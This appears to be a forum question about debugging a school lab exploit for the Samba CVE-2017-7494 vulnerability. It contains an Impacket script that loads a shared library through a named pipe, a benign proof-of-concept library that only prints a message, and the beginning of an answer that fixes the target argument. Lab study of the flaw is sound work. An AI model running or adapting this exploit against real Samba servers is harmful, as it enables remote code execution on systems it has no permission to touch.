I am doing a small school cybersec project, there is one small bug with my Python (with Impacket library: transport module for RPC) script. It is a very simple script and payload can be found on GitHub for your reference: https://github.com/omri9741/cve-2017-7494/blob/master/exploit.py
from optparse import OptionParser
from impacket.dcerpc.v5 import transport
def main():
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="target ip address")
parser.add_option("-m", "--module", dest="module", help="module path on
target server")
(options, args) = parser.parse_args()
if options.target and options.module:
stringbinding = r'ncacn_np:%s[\pipe\%s]' % (options.target, options.module)
rpctransport = transport.DCERPCTransportFactory(stringbinding)
dce = rpctransport.get_dce_rpc()
dce.connect()
else:
parser.print_help()
if __name__=="__main__":
main()
I have set up the whole system (Kali Linux 2017.1) including Samba server (4.5.8) and the Samba shares has already been tested working (connect OK file transfer OK). Verified NO firewall services running. The payload has also been built into shared object libpoc.so from C file:
#include <stdio.h>
int samba_init_module(void)
{
printf("hello from cve-2017-7494 poc! ;)\n");
return 0;
}
And header file:
#ifndef poc_h__
#define poc_h__
extern int samba_init_module(void);
#endif // poc_h__
When running the command:
python exploit.py -t //localhost/pentest -m /localhost/pentest/libpoc.so
I get traceback log:
raise socket.error ("Connection error (%s:%s)" % (peer[0], peer[1]), e) socket.error:
[Errno Connection error (localhost/pentest:445)] [Errno -2] Name or service not known
You should specify just the target FQDN or IP address. For example: